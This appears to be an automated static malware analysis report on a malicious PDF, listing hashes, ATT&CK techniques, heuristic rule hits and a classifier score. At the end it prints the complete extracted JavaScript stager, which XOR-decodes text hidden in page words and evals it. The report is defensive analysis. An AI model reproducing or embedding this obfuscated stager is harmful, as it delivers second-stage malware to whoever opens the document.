Malicious PDF / .TXT — malware analysis report

Static analysis result for SHA-256 79b56e162b6b26cd…

MALICIOUS

PDF / .TXT

4.6 KB
MD5: 093689fdceefc8582102d369589237c9 SHA-1: c9ad642afc096450fc1e9de54194ae9f5cf0bd36 SHA-256: 79b56e162b6b26cdac5d6ec9b498b5c6787b69a47280eab23bfbb8efcc08e281
Risk Score: 86

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1566.001 Phishing: Spearphishing Attachment

The PDF contains embedded JavaScript that is heavily obfuscated. The script decodes a string using XOR operations and then executes it. This pattern is typical for downloading and executing a second-stage payload. The ML classifier and heuristic firings strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (3)

  • Page-word XOR JavaScript eval stager (severity: high; rule PDF_PAGE_WORD_XOR_EVAL_STAGER)
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action (severity: low; 1 related finding; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (severity: low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  Filename: javascript_obj0011_000.js
  SHA-256:  725b7386f6e9caae9e03f9492eb7f26f190197c23637c755c72761214d6aafe9
  Kind:     pdf-javascript-stream
  Source:   PDF /JS object 11 at offset 0xC9C
  Size:     852 bytes

Preview of the extracted script (first 1,000 lines):
var gR="charUv3A".substr(0,4)+"CodeUKFI".substr(0,4)+"KrpAtrpK".substr(3,2);var p=62;var pK="subs"+"tr";var eT=this;function x(r,xO){return r^xO;};var aX="uneVmHA".substr(0,3)+"sca"+"pe";var t=1;var j="Rj5getP".substr(3)+"wYjageNjwY".substr(3,4)+"7UithWoi7U".substr(3,4)+"yXCrdyXC".substr(3,2);var d=new String();var f="Z45from".substr(3)+"dU2Char2Ud".substr(3,4)+"Code9aFO".substr(0,4);;var tA="xN5getPa".substr(3)+"3vSgeNum".substr(3)+"Words";var wH=String;var jA=["a","","p","p"];mB=new String(jA[0]+jA[2]+jA[2]+jA[1]);var b=["e","","a","l","v"];h=new String(b[0]+b[4]+b[2]+b[3]+b[1]);var n=4294-4294;var dM=91-89;;var aXY="XKw%".substr(3);var mB=eT[mB];var mJ=eT[aX];var v=eT[h];;var vA=eT[tA](t);for(var mR=n;mR<vA;mR++){rS=eT[j](t,mR);var aJ=rS[pK](rS.length-dM,dM);var z=aXY+aJ;var dS=mJ(z);var gN=dS[gR](n);var vAV=x(gN,p);d+=wH[f](vAV);}v(d);